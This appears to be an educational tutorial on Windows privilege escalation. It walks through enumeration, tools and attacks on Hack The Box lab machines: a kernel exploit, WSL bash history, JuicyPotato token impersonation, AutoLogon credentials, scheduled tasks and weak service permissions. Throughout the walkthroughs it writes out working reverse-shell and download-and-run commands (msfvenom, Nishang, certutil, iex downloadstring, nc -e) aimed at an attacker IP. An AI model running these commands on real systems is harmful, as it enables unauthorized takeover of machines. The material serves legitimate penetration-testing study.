If you want to use Windows privilege escalation techniques to help elevate your privileges, you’ve come to the right place.
Our thorough guide will show you all things Windows privilege escalation. This guide will show you how to use manual enumeration methods to detect potential privilege escalation paths. We will also show you some automated tools to help in your search.
Next, we will walk you through different types of privilege escalation, such as kernel exploits, token impersonations, saved credentials, scheduled tasks, and more.
After reading our guide, you will be well on your way to understanding how to leverage your privileges on Windows.
Understanding Privilege Escalation
Privilege escalation in the Windows operating system occurs when users obtain access to more system resources than their privileges permit. It entails switching from a lower-level user to a higher-level one, like the administrator or the "NT AUTHORITY/SYSTEM” account. Misconfiguration, or a weak point in the system, is how escalation is possible.
The difference between an administrator and a system account comes down to how much control they have over the operating system and processes.
An administrator can change security settings, install software and hardware, access all files on the computer, and make changes to other user accounts.
A system account is a built-in Windows account with the highest levels of permissions. The operating system uses this account to run system services, processes, and tasks, even though it does not correspond to a physical user. It has full access to the file system and can perform system-level changes.
Detection
Now that you understand the different user levels in a Windows environment, let's look at ways to enumerate the operating system to help detect privilege escalation vectors.
Manual
These following commands can be run from the command prompt or PowerShell.
System Enumeration
Enumerating the operating system, including its version and patch level, can help you find if any potential kernel exploits are available for the Windows machine.
systeminfo
The command systeminfo gives you a view of the Windows operating system you're dealing with. Everything from OS name, version, and build type to processors, BIOS version, and more.
wmic qfe
wmic qfe gives you an overview of what updates have been installed in Windows, giving you a view of the system's patch history and enabling you to identify any missing patches or updates that could be exploited for privilege escalation.
User Enumeration
Doing user enumeration can give you a good overview of your current user, which privileges you have, and which groups you are a part of. This can be beneficial in locating privilege escalation paths that will allow you to abuse privileges or exploit misconfigurations.
whoami
The whoami command informs you about what user you are currently running as. You can also use this with other switches, such as /priv and /groups, to gather more information on the privileges granted to your user and what security groups you are a member of.
net user
The net user command will print out the users on the system.
You can also use the net user username to get a good overview of a specific user. This will show you the user's name, password information, and group membership, along with the account's various settings and properties.
net localgroup
The net localgroup command will display all available groups on the system. This can be useful for understanding the different access levels available on a system.
You can also use this command with a group name to get an overview of the group's information and which users belong to it.
You can manually enumerate Windows in many more ways, which we won’t be going into, but they include network enumeration, AV enumeration, and service and process enumeration.
Check out our “Windows Command Line Cheat Sheet: All You Need in One Place” article for a deep dive into the Windows command line.
Automated Tools
Automated tools can be a great help when looking for privilege escalation paths, as they can quickly and efficiently scan for known vulnerabilities, misconfigurations, and weak security practices.
WinPEAS
WinPEAS, also known as the “Windows Privilege Escalation Awesome Scripts,” is a popular, well-known, and simply excellent open-source tool to help find potential paths to privilege escalation in a Windows system.
It uses a color-coded system that shows you which areas to look at first. WinPEAS can identify several common security misconfigurations, such as weak folder permissions, weak registry permissions, misconfigured services, scheduled tasks, and more.
PowerUp
PowerUp is a PowerShell script that looks for common privilege escalations on the target system. You can run it with the Invoke-AllChecks parameter, which executes all checks. You can also use it to do specific checks, like with the Get-UnquotedService parameter, which only looks for possible unquoted service path vulnerabilities. You may need to bypass the execution policy on the target system to run PowerUp.
Seatbelt
Seatbelt is a C# tool, part of the GhostPack suite of tools, that will perform a series of checks, gathering system and user data rather than looking for privilege escalation vectors. It can be very useful for identifying potential paths for escalating privileges.
SharpUp
SharpUp is another tool from the GhostPack collection that acts as a C# port for multiple PowerUp functions. The majority of checks are included. It is a flexible tool that enables you to perform individual vulnerability checks or a full audit that executes every check.
Windows Exploit Suggester
Windows Exploit Suggester is a tool that can locate privilege escalation paths by examining the patch levels of a Windows system. It compares the system's patch levels against the Microsoft vulnerability database to detect potential missing patches. By identifying these missing patches, the tool can provide a list of potential vulnerabilities to exploit for privilege escalation.
You can also see a newer version of the tool called Windows Exploit Suggester - Next Generation (WES-NG).
See our “25 Top Penetration Testing Tools for Kali Linux” article for other important tools used in Kali.
Kernel Exploits
Kernel exploits are vulnerabilities found in the Windows OS that allow attackers to escalate privileges. These exploits target flaws in the operating system's kernel.
An attacker may gain unauthorized access to system-level privileges by exploiting these vulnerabilities. This can lead to a complete takeover, allowing the attacker to execute arbitrary code, modify system data, install software, or perform other actions.
Let’s look at how to take advantage of a kernel exploit and go from a low-level user to system. We will be using the “Hack The Box: Devel” machine.
Once you have established a reverse shell via Netcat, you can run the systeminfo command.
Copy the contents of the output and save it to a file in the same folder as the Windows Exploit Suggester on your local machine. We saved ours as systeminfo.txt.
You'll need to update the Windows Exploit Suggester database before running the script. See the readme for more information.
Run the Windows Exploit Suggester script with the system information and database file.
You’ll see a list of potential exploits. The one we are interested in is MS10-059, also called Chimichurri. See this article if you want to read more about this exploit. This exploit will allow you to spawn a shell as the system account.
Head to this GitHub page and download the executable to your attacking machine.
Always ensure you understand what you are downloading and what the script or exploit is doing. Using scripts you don't understand can have severe consequences, especially if you are using them in a real-world environment.
Once downloaded, start a Python server in Kali in the same folder as the downloaded exploit. Use the following command:
python3 -m http.server
Back on the Windows machine, move into the temp folder, and download the exploit using certutil.
certutil -urlcache -f http://10.10.14.10:8000/MS10-059.exe exploit.exe
The temp folder is a good place to download scripts, tools, and exploits, as it usually has the permissions needed to write and execute.
Next, start a Netcat listener on your attacking machine. On Windows, run the exploit with the IP of your machine and the port you just used with Netcat.
exploit.exe 10.10.14.10 5555
Back on our machine, we will have an elevated shell.
As you can see, finding outdated or unpatched systems can lead you to privilege escalation via a kernel exploit. Be cautious with kernel exploits, as they can sometimes cause instability in the target systems. Research their reliability and make sure someone is available to restart the machine if needed.
Windows Subsystem for Linux
WSL stands for Windows Subsystem for Linux. It is a compatibility layer for running Linux on your Windows system. It allows users to run a GNU/Linux environment directly on Windows without needing a virtual machine, including most command-line tools and utilities.
In certain situations, you can take advantage of WSL if it runs with root privileges, allowing you to create an elevated shell. In our demo, we will use a different privilege escalation approach.
Let’s look at how we can use WSL for privilege escalation via bash history on the “Hack The Box: SecNotes” machine.
Once you’ve established a shell on the machine and have located the user.txt file on Tyler's desktop, you will notice a bash.lnk file. This file could indicate that this Windows OS is running WSL.
Let’s see if we can find out if bash.exe is running on the system.
You can use the following command to try and find it: where /R C:\Windows bash.exe
Great, bash.exe is located in two different folders.
Let’s run it from the System32 folder using the command: C:\Windows\System32\bash.exe
We must escape the shell restrictions using the following command: python3 -c 'import pty;pty.spawn("/bin/bash")'
Next, we can do some Linux enumeration. If you’ve read our article on Linux Privilege Escalation, you’ll know that one good place to look for information is in history.
Let’s look at the command history.
And we’ve found some credentials for the administrator of the Windows system. We could run the command above with the machine's IP, and we would have access to the system folders, but we can also run psexec and get an interactive system shell, giving us more control.
Privilege escalation can be possible through WSL, and It’s always a good idea to check the history as a first step when enumerating; you’ll be surprised by what you might find.
Token Impersonation
A token impersonation privilege escalation attack occurs when a lower-privileged user steals a token from a higher-privileged user or process and uses it to perform actions they normally wouldn't be allowed to do, like accessing sensitive data or modifying important system settings.
Think of a token like an ID card. Each ID card belonging to a different user or service has specific privileges to control resource access.
If your user has “SeImpersonatePrivilege” enabled, you can use a potato attack to escalate privileges.
In our demo, we will be using the juicy potato attack. JuicyPotato doesn't work on Windows Server 2019 or Windows 10 build 1809 onward. However, other similar attacks can be used to leverage the same privileges. Research the specific OS and build you’re targeting.
We can see how this works using the “Hack The Box: Bounty” machine.
Once you’ve established a shell, we can start doing manual enumeration. Let’s look at the whoami and the whoami/priv commands.
As you can see, we have the correct privilege to perform the juicy potato attack. Let's run systeminfo and see if we have the correct Windows build.
We are good to go with the juicy potato attack. Let’s download the exploit from Github to Kali.
Make sure you are serving the file using a python3 simple server set up in the same directory as the exploit using:
python3 -m http.server
You could also use an Apache or SMB server.
Now transfer it to the Windows machine with this command:
(new-object net.webclient).downloadfile('http://10.10.14.12:8000/jp.exe', 'C:Users\merlin\Desktop\jp.exe')
Next, we must create our reverse shell. Download the Invoke-PowerShellTcp.ps1 script from the Nishang repository.
Add the following to the bottom of the script and save it. We saved ours as shell2.ps1.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 8888
Ensure you use the IP from your attacking machine and whatever port you use with Netcat to catch the shell.
Now create a .bat file containing this one-liner:
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.12/shell2.ps1')
It will download the shell2.ps1 script and run it. We called ours bounty.bat. You can use your preferred text editor to do this (Nano, Vi, Gedit, Leafpad, etc.) or use the touch command to create the file and echo the one liner into it.
Next, download the bounty.bat file to the Windows machine from your server using the (new-object net.webclient).downloadfile command shown previously.
Ensure you have a server set up in Kali to host the file.
Start a Netcat listener on Kali using the information from shell2.ps1 script.
We can finally start the exploit, but ensure you run it with these three flags.
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: a program to launch
-l <port>: COM server listen port (any port will do)
Here is the command to run:
./jp.exe -t * -p C:Users\merlin\Desktop\bounty.bat -l 4444
And we are now system.
Always check your privileges when stepping into a new Windows shell, as you may have privileges that can be abused, enabling you to move to the administrator or system.
Saved Credentials
Occasionally, in Windows, there will be instances where a user's credentials will be saved in plain text. This happens for various reasons. One reason is if the Windows AutoLogon feature is enabled. This feature stores credentials in plain text in the registry, allowing other users to start the computer and log on automatically using the said account.
Our demo will show you how to leverage this feature to take us from a low-level account to the administrator.
We will use the “Hack The Box: Chatterbox” machine for this demo. Once you establish the reverse shell via the buffer overflow, you will be the user Alfred.
We can begin with some automated enumeration by downloading winPEAS from our attacking machine to Chatterbox with the following command:
certutil -urlcache -split -f "http://10.10.14.12:8000/winPEASany.exe" wp.exe
Ensure you have a server on your attacking machine in the same folder as winPEAS, so you can download the file. You can use: python3 -m http.server
After running winPEAS, you will notice it found AutoLogon credentials for the user Alfred. The password may also work for the administrator user.
We must use the PowerShell automation utility, as we cannot test this via RDP or other methods. This will allow us to run scripts in the context of another user.
The first step is to create a reverse shell using MSFvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe > shell.exe
Next, we must use the certutil command to download shell.exe to Chatterbox. Remember to set up the server to host the file.
Start Netcat with the same port you used for the MSFvenom payload. Next, run the following PowerShell command to get a reverse shell as the administrator.
powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator', $password);Start-Process -FilePath "shell.exe" -Credential $creds"
Let's break down the command step by step:
powershell -c: This starts a PowerShell session and executes the following command.$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force;: This line sets the $password variable to a secure string representation of the password 'Welcome1!'. The ConvertTo-SecureString cmdlet is used to convert a plain text password into a secure string. The -AsPlainText parameter specifies that the password is provided as plain text, and the -Force parameter ensures that the conversion is performed without prompting for confirmation.$creds = New-Object System.Management.Automation.PSCredential('Administrator', $password);: This line creates a new PSCredential object named $creds using the New-Object cmdlet. The PSCredential object represents a set of security credentials, including a username and password. In this case, the username is 'Administrator', and the password is the secure string stored in the $password variable.Start-Process -FilePath "shell.exe" -Credential $creds: This line starts a new process using the Start-Process cmdlet. It launches an executable file named "shell.exe". The -Credential parameter specifies the credentials to be used when running the process, and $creds contains the PSCredential object created in the previous step, which includes the username and password.
In summary, this PowerShell command sets a secure password, creates a set of credentials using the username 'Administrator' and the secure password, and then launches the reverse shell using those credentials.
And we have now escalated our privileges to the administrator.
As you can see, sometimes credentials will be saved in plain text and can be used to elevate privileges if they are reused for other services or users.
Scheduled Tasks
Scheduled tasks in Windows are an automated way of running certain scripts or programs at set times. As cron jobs work in a Linux environment, scheduled tasks let users run tasks such as backups, updates, and virus scans at a specific time; it could be every minute, every hour, or even every day.
This can lead to privilege escalation if the task has misconfigured permissions. This may enable a low-level user to modify the task or file, allowing them to make it do whatever they want.
Since most tasks are run with the privileges of the administrator (who most often is the one who created the task), the script will also run with these higher privileges, allowing the user to escalate privileges.
Let’s look at how this works using the “Hack the Box: Tally” machine. Once you have the reverse shell courtesy of SQL, you will be the user Sarah.
Head to Sarah's desktop; you will also notice two interesting files.
If you look at the .xml file, you’ll notice a few things. It tells us that the PowerShell script SPBestWarmUp.ps1 with the -ExecutionPolicy Bypass and -skipadmincheck arguments will run under the TALLYAdministrator user's permissions. It runs every hour of the day.
Since the file runs with the administrator's privileges, we can use this script to escalate privileges. But first, let’s see if we have the correct permissions to modify it.
You can use the following PowerShell command to check the file’s permissions: Get-Acl SPBestWarmUp.ps1 | Format-List
See our “The Most Helpful PowerShell Cheat Sheet You’ll Ever Find” article for a thorough list of PowerShell commands.
As we are the user Sarah, we own the file and can now use this to change the contents of the file and give us a reverse shell.
We need to copy the Nishang reverse shell to our attacking machine and add the following line to the bottom of the script:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 4444
Remember to use the IP from your machine and the port you will use with Netcat.
Set up a Python server in the same directory as the Nishang script.
python3 -m http.server
Start your Netcat listener and use the following command to replace the contents of the SPBestWarmUp.ps1 file with our reverse shell.
echo "iex(new-object net.webclient).downloadstring('http://10.10.14.12:8000/shell2.ps1')" > SPBestWarmUp.ps1
Now wait for the scheduled task to run. It could take up to an hour to spawn the shell.
Sometimes scheduled tasks will have misconfigured permissions that will allow you to escalate privileges. In a real engagement, ALWAYS make sure to back-up and restore any files you modify, replace, or delete.
Weak Service Permissions
In Windows, services allow applications to run in the background with certain permissions. These services can run with different privilege levels depending on how they are configured. This can be a low-level user all the way up to the system account.
When a low-level user can modify a service with high-level privileges, that is called weak service permissions.
Misconfigurations could include
- Improper access control lists (ACLs) that allow non-administrators to modify the service.
- The service has weak file permissions.
Let’s look at how to take advantage of weak service permissions using the “Hack The Box: Querier” machine.
Once you have your shell, you will be the mssql_svc user.
Our first step will be downloading the PowerUp script from our attack machine. You can start a Python server in the same directory as the script with the following command: python3 -m http.server
Enter Powershell and then move into the C:\Reports folder. Use the following command to download the PowerUp script:
Invoke-WebRequest -Uri http://10.10.14.15:8000/PowerUp.ps1 -OutFile C:\Reports\PowerUp.ps1
Ensure you change the IP and port to your machine's settings.
Once downloaded, run PowerUp with Invoke-AllChecks.
We have more than a few paths to take. But for this demo, we are interested in the service UsoSvc. With this service, we can use the PowerUp Invoke-ServiceAbuse function, which abuses a function where the current user has configuration rights to add a local administrator or execute a custom command.
It's important to note that to exploit the service, CanRestart must be True. As restarting the service is how we have our commands executed.
We can do this manually by changing the binpath to run a command. We will run Netcat to give us a reverse shell as the administrator.
Change back to a regular command prompt. We need to modify the configuration of the UsoSvc service by setting the binpath to run our Netcat reverse shell using the ‘sc’ (Service Control) command.
sc config UsoSvc binpath= "C:\Reports\nc.exe -e cmd.exe 10.10.14.15 4444"
To check if the command worked and query the configuration information of the service, you can use the command:
sc qc UsoSvc
The command worked, as the new binpath is set to our command. Now we need to stop and then restart the service to pop our shell as system.
Ensure you have Netcat started on your attacking machine, and once you start the service, you will have an elevated shell.
As you can see, if services have weak permissions, you can take advantage to elevate your privileges. As we mentioned in the Scheduled Tasks section, in a real engagement, ALWAYS make sure to back-up and restore any files you modify, replace, or delete.
Other Methods
There are many other methods for privilege escalation in Windows that you can learn, but we cannot walk through them all.
These include:
- Always Install Elevate
- Run As
- Startup Applications
- Executable Files
- DLL Hijacking
- Unquoted Service Paths
- Weak Registry Permissions
Conclusion
As you've seen, there are many paths for Windows privilege escalation attacks.
We’ve shown you how to do some manual enumeration, what automated tools we recommend you use, and what they do.
By taking advantage of kernel exploits, token impersonation, scheduled tasks, and other paths, you can escalate privileges and become the administrator user or even the system account.
It's a good idea to keep up with the latest tools and techniques when it comes to Windows privilege escalation techniques, and we've provided you with a great starting point for your journey.
Frequently Asked Questions
Level Up in Cyber Security: Join Our Membership Today!
